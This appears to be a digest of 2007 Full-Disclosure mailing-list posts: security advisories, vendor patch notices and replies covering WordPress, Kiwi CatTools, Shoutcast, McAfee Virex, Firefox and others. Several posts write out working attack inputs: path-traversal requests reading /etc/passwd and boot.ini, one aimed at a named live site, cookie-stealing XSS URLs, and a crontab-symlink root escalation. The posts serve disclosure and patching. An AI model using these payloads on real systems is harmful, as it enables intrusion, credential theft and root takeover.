Re: [Full-disclosure] Extracting files from SMB packet captures
While I haven't done anything specifically with SMB, I did come up with the following a few years back: it might prove useful in your research: http://www.adminprep.com/articles/default.asp?action=showarticleid=52 It covers taking an ethereal data cap, and taking portions of it to come up with the original content, i.e. .wav's, .mov's, .zip's, .jpg's, etc. You get the idea. If you have any sanitized caps you want to send my way, I'd be happy to play around with them, as well. Mike On 2/26/07, Jim O'Gorman [EMAIL PROTECTED] wrote: I have been working with extracting files from full-content SMB packet captures. I would like to compare what I have found with other sources to see how right/wrong I am about a few things. Does anyone have good sources of examples on pulling files out of SMB packet captures I can use as a reference? Tools or write ups would be great. Thanks Jim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
[EMAIL PROTECTED] wrote: SEC Consult Security Advisory 20070226-0 === title: File Disclosure in Pagesetter for PostNuke program: Pagesetter page creation module vulnerable version: 6.2.0 6.3.0 beta 5 impact: high homepage: http://www.elfisk.dk found: 2006-11-21 by: D. Matscheko / SEC-CONSULT / www.sec-consult.com === vendor description: --- Pagesetter is a publishing module that allows the PostNuke users to create web pages from structured data, with the data structure and output templates defined by the PostNuke administrator. [Source: http://www.elfisk.dk] I think brendanb's going to be busy. http://www.nesco.com.au/index.php?module=Pagesettertype=filefunc=previewid=../../../../../../../../../etc/passwd%00 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kiwi CatTools TFTP server path traversal
Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 server can lead to information disclosure and remote code execution Risk: High DISCUSSION Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET request which can be used to download/upload any file from/to server. Default setting allows replacing of existing files. Such settings lead to probability to replace an executable files and run code on attacker choice. EXAMPLES C:\tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\type boot.txt [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\type pttest.txt [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\ SOLUTION Upgrade to CatTools 3.2.9 which is available for download at http://www.kiwisyslog.com/downloads.php http://www.kiwisyslog.com/downloads.php CREDITS Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) DISCLOSURE TIMELINE Vulnerability discovered: 11/20/2006 Initial vendor contact:12/08/2006 Patch released: 02/13/2007 Public disclosure: 02/27/2007 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple SQL Injection bugs in TCS website
Hello list, The website of TCS (Tata Consultancy Services) is prone to multiple SQL injection bugs. I already sent them an email back in December 2006. They have not fixed the bug just yet, so Iam going to disclose the details here. http://kishfellow.blogspot.com The scripts are prone to multiple XSS, and SQL bugs. A sample screenshot for a potential SQL injection is given in my blog. Cheers :) Kish Full-Disclosure - We believe in it ! Remember there is alwayz someone who knows more than us out there - Don't get soaked. Take a quick peak at the forecast with theYahoo! Search weather shortcut.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Extracting files from SMB packet captures
Not SMB specific, however it should do the job. http://tcpxtract.sourceforge.net/ Regards, ZQ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Extracting files from SMB packet captures
Jim O'Gorman wrote: Does anyone have good sources of examples on pulling files out of SMB packet captures I can use as a reference? Tools or write ups would be great. search for smbspy http://www.google.com/search?q=smbspy /rl ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
On Tue, 27 Feb 2007, Richard Moore wrote: html body onunload=location = self.location a href=http://slashdot.org/;http://slashdot.org//a /body /html Yeah, and the other way round: http://lcamtuf.coredump.cx/ietrap/, when used with FF 2.0.0.2, puts you on a page that: 1) Has URL bar data and favicon from the target site, 2) Views source of what you added with document.write(), 3) Displays as blank. Moreover, repeatedly setting document.location = xxx; on departure may land you at slashdot.org/xxx instead (meaning the update is being performed in the context of the new page). Although this looks like a Really Bad Thing (tm), I didn't succeed in modifying /ietrap/ to display a malicious payload (though feels like it's sooo close), nor in manipulating DOM in the latter example to do anything other than annoying the user (because 2.0.0.1 kept crashing ;-). Still, I'm not gonna sleep well until this is fixed. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal
Probably, it's same or related issue for reported by nicob at nicob.net. http://securityvulns.com/news/KIWI/CatTools/DT.html CVE-2007-0888 --Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com: n Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 n server can lead to information disclosure and remote code execution n Risk: High n DISCUSSION n Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET n request which can be used to download/upload any file from/to server. n Default setting allows replacing of existing files. Such settings lead to n probability to replace an executable files and run code on attacker choice. n EXAMPLES C:\tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt n Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\type boot.txt n [boot loader] n timeout=30 n default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt n Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\type pttest.txt n [boot loader] n timeout=30 n default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\ n SOLUTION n Upgrade to CatTools 3.2.9 which is available for download at n http://www.kiwisyslog.com/downloads.php n http://www.kiwisyslog.com/downloads.php n CREDITS n Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) n DISCLOSURE TIMELINE n Vulnerability discovered: 11/20/2006 n Initial vendor contact:12/08/2006 n Patch released: 02/13/2007 n Public disclosure: 02/27/2007 -- ~/ZARAZA http://securityvulns.com/ Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200702-11 ] MPlayer: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200702-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: MPlayer: Buffer overflow Date: February 27, 2007 Bugs: #159727 ID: 200702-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow was found in MPlayer's RTSP plugin that could lead to a Denial of Service or arbitrary code execution. Background == MPlayer is a media player capable of playing multiple media formats. Affected packages = --- Package / Vulnerable /Unaffected --- 1 media-video/mplayer 1.0_rc1-r2= 1.0_rc1-r2 Description === When checking for matching asm rules in the asmrp.c code, the results are stored in a fixed-size array without boundary checks which may allow a buffer overflow. Impact == An attacker can entice a user to connect to a manipulated RTSP server resulting in a Denial of Service and possibly execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All MPlayer users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-video/mplayer-1.0_rc1-r2 References == [ 1 ] Original Advisory http://www.mplayerhq.hu/design7/news.html#vuln14 [ 2 ] CVE-2006-6172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200702-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpxhJnZopkSx.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200702-12 ] CHMlib: User-assisted remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200702-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: CHMlib: User-assisted remote execution of arbitrary code Date: February 27, 2007 Bugs: #163989 ID: 200702-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A memory corruption vulnerability in CHMlib could lead to the remote execution of arbitrary code. Background == CHMlib is a library for the MS CHM (Compressed HTML) file format plus extracting and HTTP server utils. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-doc/chmlib0.39 = 0.39 Description === When certain CHM files that contain tables and objects stored in pages are parsed by CHMlib, an unsanitized value is passed to the alloca() function resulting in a shift of the stack pointer to arbitrary memory locations. Impact == An attacker could entice a user to open a specially crafted CHM file, resulting in the execution of arbitrary code with the permissions of the user viewing the file. Workaround == There is no known workaround at this time. Resolution == All CHMlib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-doc/chmlib-0.39 References == [ 1 ] Original Advisory http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=468 [ 2 ] CVE-2007-0619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0619 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200702-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpt9te8SRPmt.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
Resent as I realised I'm not subscribed here Michal Zalewski wrote: I can't really comment on whether this fixes the problem once and for all, because I haven't really examined the changes implemented for 364692, but yeah, my example no longer crashes the browser for me. I think there are still underlying problems in the code as the following illustrates: 1. Put this in a web page, then view it in firefox. html body onunload=location = self.location a href=http://slashdot.org/;http://slashdot.org//a /body /html 2. Click on the link which should take you to slashdot and you'll end up back where you were (this has been known about for ages). 3. Now do 'View Source' and you get shown the sourcecode to slashdot rather than the source code for the page you're viewing. Actual Results: View source displays the contents of the wrong site Expected Results: I'd expect to see the source code for the page I'm viewing. A web page could trigger the link itself using DOM events (or naviagate away using javascript form submission) and use this technique to hide the source code of a malicious page from the user. I did a quick check that document.cookie wasn't chcking the wrong URL, but I have not checked extensively which other parts of the browser can be spoofed in this fashion. I reported this via bugzilla, but it was closed as a duplicate of bug 253497 which was reported in 2004. Cheers Rich. -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Disabling Google Desktop Link Integration In Google Pages
GDS Desktop Link and Google.com Integration - Bad Design or Necessary Evil? The recent security advisory on Google Desktop Search (GDS) published by Watchfire did not really surprised me as I was expecting more like this in past 2 years. However, the fact that intrigued me to write this article is Google has not yet bothered to provide it's GDS tool users the option to disable GDS desktop link regardless of knowing this design will attract more attacks in future as well. In this article, I'll discuss a bit about why the GDS issues revolves primarily around the GDS Desktop link and how one can fix it permanently by disabling it which will ensure that users can still use GDS without the fear against exploits that are targeted towards the desktop link. Get the entire article here - Disabling GDS Desktop Link Integration In Google Pages http://hackingspirits.com/vuln-rnd/vuln-rnd.html Regards, -d (aka T) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
Michal Zalewski wrote: I can't really comment on whether this fixes the problem once and for all, because I haven't really examined the changes implemented for 364692, but yeah, my example no longer crashes the browser for me. I think there are still underlying problems in the code as the following illustrates: 1. Put this in a web page, then view it in firefox. html body onunload=location = self.location a href=http://slashdot.org/;http://slashdot.org//a /body /html 2. Click on the link which should take you to slashdot and you'll end up back where you were (this has been known about for ages). 3. Now do 'View Source' and you get shown the sourcecode to slashdot rather than the source code for the page you're viewing. Actual Results: View source displays the contents of the wrong site Expected Results: I'd expect to see the source code for the page I'm viewing. A web page could trigger the link itself using DOM events (or naviagate away using javascript form submission) and use this technique to hide the source code of a malicious page from the user. I did a quick check that document.cookie wasn't chcking the wrong URL, but I have not checked extensively which other parts of the browser can be spoofed in this fashion. I reported this via bugzilla, but it was closed as a duplicate of bug 253497 which was reported in 2004. Cheers Rich. -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities scip AG Vulnerability ID 2962 (02/27/2007) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962 I. INTRODUCTION WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. More information is available on the project web site at the following URL: http://www.wordpress.org II. DESCRIPTION Stefan Friedli found several vulnerabilities based on an advisory entitled WordPress AdminPanel CSRF/XSS - 0day by Samenspender which described a lack of input validation when deleting posts that allows injection of arbitrary code. The vulnerability was reported on February, 26th and is referenced in section VII. Further to this vulnerability which was limited on manipulating the post-parameter, there are several other vulnerabilities which are very similar to the one mentioned above. Every operation that makes use of the common confirm-dialog is vulnerable for this type of attack. Possible injection... ... when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php) http://target.tld/wp-admin/post.php?action=deletepost='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting comments (unvalidated parameter: c, file: comment.php) http://target.tld/wp-admin/comment.php?action=deletecommentp=39c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting pages (unvalidated parameter: page, file: page.php) http://target.tld/wp-admin/page.php?action=deletepost='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting categories (unvalidated parameter: cat_ID, file: categories.php) http://target.tld/wp-admin/categories.php?action=deletecat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ... when deleting comments (unvalidated parameter: c, file: comment.php) http://target.tld/wp-admin/comment.php?action=deletecommentp=35c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E IV. IMPACT This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the Delete Post-function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site-scripting or any other webbased exploitation. V. DETECTION This flaws can be detected by using any web browser. VI. SOLUTION Until these issues are patched, possible workarounds are manual fixing or the usage of a application level filter like mod_security for Apache. VII. SOURCES Samenspender - WordPress AdminPanel CSRF/XSS - 0day http://seclists.org/bugtraq/2007/Feb/0494.html scip AG - Security Consulting Information Process (german) http://www.scip.ch scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962 IX. DISCLOSURE TIMELINE 02/26/06 Release of Delete Post-Confirmation Vulnerability 02/27/06 Identification of further vulnerabilities 02/27/06 Immediated Release for informational purposes IX. CREDITS The vulnerabilities were discovered by Stefan Friedli. Stefan Friedli, scip AG, Zuerich, Switzerland stfr-at-scip.ch http://www.scip.ch A2. LEGAL NOTICES Copyright (c) 2007 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS oTWNsT+cOMwFq+XKsZqq6yJ/ =REO6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WordPress Search Function SQL-Injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 +--- - -- - | SaMuschie Research Labs proudly presents . . . +--- -- - - | Application: wordpress | Version: = 2.1.1 | Vuln./Exploit Type: SQL-Injection | Status: 0day +- -- - - | Discovered by: Samenspender | Released: 20070227 | SaMuschie Release Number: 2 +--- - -- - Searching for a single ,,comma,, generates a sql error message. e.g.: http://wordpress-deutschland.org/?s=, results in: WordPress Datenbank-Fehler: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DE' at line 1] SELECT SQL_CALC_FOUND_ROWS wpdorg_posts.* FROM wpdorg_posts WHERE 1=1 AND () AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DESC LIMIT 0, 10 +- -- - | Lameness Disclaimer +- - -- - - | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers they don't know the answer ;) +-- - -- - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5GSdMFgfGpQK8VERAvOWAJwLms5H6b4So3tO19lc3eHMGeNvLwCdHAP8 ZfylSi7g8HINHkpBYzYgUqE= =fBdH -END PGP SIGNATURE- ___ Telefonate ohne weitere Kosten vom PC zum PC: http://messenger.yahoo.de ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Nullsoft ShoutcastServer Persistant XSS - 0day
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 +--- - -- - | SaMuschie Research Labs proudly presents . . . +--- -- - - | Application: Nullsoft ShoutcastServer | Version: 1.9.7/Win32 (other versions/platforms not tested) | Vuln./Exploit Type: Persistant XSS | Status: -0day +- -- - - | Discovered by: Muschiemann | Released: 20070227 | SaMuschie Release Number: 3 +--- - -- - It is possible to inject scriptcode into the applications logfile without authentication. Once the admin is viewing the logfile via the web interface, the scriptcode will be executed. e.g.: http://victim:8001//scriptalert(document.getElementsByTagName(PRE)[0].firstChild.data)/script By abusing this vuln it is possible to send the complete logfile to an evil host. +- -- - | Lameness Disclaimer +- - -- - - | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers they don't know the answer ;) +-- - -- - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (MingW32) iD8DBQFF5H4RCrtcl+ifKZARAsHoAJ9xBhoq8tuX/I5mPU1OjmJbRJSPggCfTNFj 8kqRWw8smOdqvIoKPWTuZuA= =oALk -END PGP SIGNATURE- ___ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 02.27.07: Computer Associates eTrust Intrusion Detection Denial of Service Vulnerability
Computer Associates eTrust Intrusion Detection Denial of Service Vulnerability iDefense Security Advisory 02.27.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 27, 2007 I. BACKGROUND Computer Associates eTrust Intrusion Detection is a network intrusion management and prevention system, that includes real-time session monitoring and Internet web filtering capabilities. More information can be found on the vendors site at the following URL. http://www3.ca.com/solutions/Product.aspx?ID=163 II. DESCRIPTION The eTrust Intrusion Detection process listens on TCP port 9191 for remote administration functions. Administrator login requires that keys be exchanged including a session key with blowfish encryption of the login and the password. Since the administration server fails to properly validate the key length value, it is possible to cause the product to crash. During decryption, 4 is subtracted from the specified length and the result used as the length of the data to decrypt. The decryption loop will proceed to overwrite the entire heap segment. This leads to an unhandled exception. III. ANALYSIS Exploitation of this vulnerability allows attackers to cause the administration service to crash. Since the heap is not used once corrupted, the heap overflow cannot be exploited for more than a denial of service. IV. DETECTION iDefense has confirmed this vulnerability in Computer Associates eTrust Intrusion Detection version 3.0.5.57. Other versions are suspected vulnerable. V. WORKAROUND iDefense is not aware of any workarounds for this issue. VI. VENDOR RESPONSE Computer Associates has issued patches to correct this vulnerability. More information is available in their advisory which can be found at the following URL. http://supportconnectw.ca.com/public/ca_common_docs/eid_secnotice.asp VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1005 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 01/16/2007 Initial vendor notification 01/16/2007 Initial vendor response 02/27/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [NETRAGARD-20070220 SECURITY ADVISORY] [McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [POSTING NOTICE] - --- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. a href=http://www.netragard.com/html/recent_research.html Netragard Research /a [About Netragard] - --- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Advisory Information] - --- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070220 Product Name: McAfee VirusScan for Mac (Virex) Product Version : = Virex 7.7 Vendor Name : McAfee Type of Vulnerability : Local root exploit and Scan Bypass Effort : Easy [Product Description] - --- Guard your Macintosh systems and users against all types of viruses and malicious code, even new unknown threats with McAfee VirusScan for Mac. - -- http://www.mcafee.com -- [Technical Summary] - --- McAfee Virex contains an exploitable feature that enables users to define what files should be excluded for scanning. This feature relies on a configuration file with insecure privileges and is located in /Library/Application Support. Any user on the system can modify or delete the configuration file thus affecting what Virex will scan. A simple example of such a modification would be to echo into the file which in turn would cause Virex to ignore all files on the entire system. [Technical Details] - --- An exploitable vulnerability exists in McAfee Virex that can be used to gain root privileges on an affected system. This vulnerability exists within the feature that enables users to define files for scan exclusion. The configuration file used to store scan exclusion files has insecure permissions of rw-rw-rw and as such can be modified or removed by any user. Upon system boot the VShieldCheck process that runs with root privileges verifies the existence of the VShieldExecute.txt file located at: /Library/Application/Sypport/Virex/VShieldExecute.txt If VShieldCheck does not find the file at boot then it recreates the file with the rw-rw-rw permissions. The exact command that it uses to set those permissions is shown below: SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod /bin/chmod a+rw '%s' /dev/null 21 The VShieldCheck process does not check for symlinks prior to creating the VShieldExecute.txt file. If an attacker creates a symlinks to: /var/cron/tabs/root from /Library/Application Support/Virex/VShieldExclude.txt then the file /var/cron/tabs/root will be created with writable permissions by the VShieldCheck process at the next system boot. Once the file is created the attacker can insert arbitrary commands into the newly created cron file that will be executed with root privileges. Example: SNOsoft-virexuser$ crontab -l crontab: no crontab for virexuser SNOsoft-virexuser$ Desktop/pwn_virex.pl Usage: Desktop/pwn_virex.pl target Targets: 0 . Virex 7.7.dmg SNOsoft-virexuser$ Desktop/pwn_virex.pl 0 *** Target: Virex 7.7.dmg /Library/Application Support/Virex/VShieldExclude.txt wait for a reboot a cron run... SNOsoft-virexuser$ crontab -l * * * * * /usr/bin/perl /Users/Shared/droptab.pl SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/ total 88 drwxrwxr-x5 root admin170 Oct 15 22:08 . drwxrwxr-x 10 root admin340 Nov 3 11:11 .. lrwxr-xr-x1 virusbar admin 19 Oct 15 22:08 VShieldExclude.txt - - /var/cron/tabs/root - -rwxr-xr-x1 root wheel
Re: [Full-disclosure] WordPress Search Function SQL-Injection
Justin Frydman - Thinkweb Media wrote: Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then? i have the same feeling tested on multiple wp instances and can't reproduce on = 2.0.1 = 2.0.7 regards, Francesco 'ascii' Ongaro http://www.ush.it/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0043-1 php php-mysql php-pgsql
rPath Security Advisory: 2007-0043-1 Published: 2007-02-27 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote System User Deterministic Unauthorized Access Updated Versions: php=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1 php-mysql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1 php-pgsql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988 https://issues.rpath.com/browse/RPL-1088 Description: Previous versions of the php package are vulnerable to multiple vulnerabilities of varying severity. The most severe of these vulnerabilities are expected to enable remote code execution as the apache user via php applications that call certain functions such as str_replace(), imap_mail_compose(), or odbc_result_all() functions. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress Search Function SQL-Injection
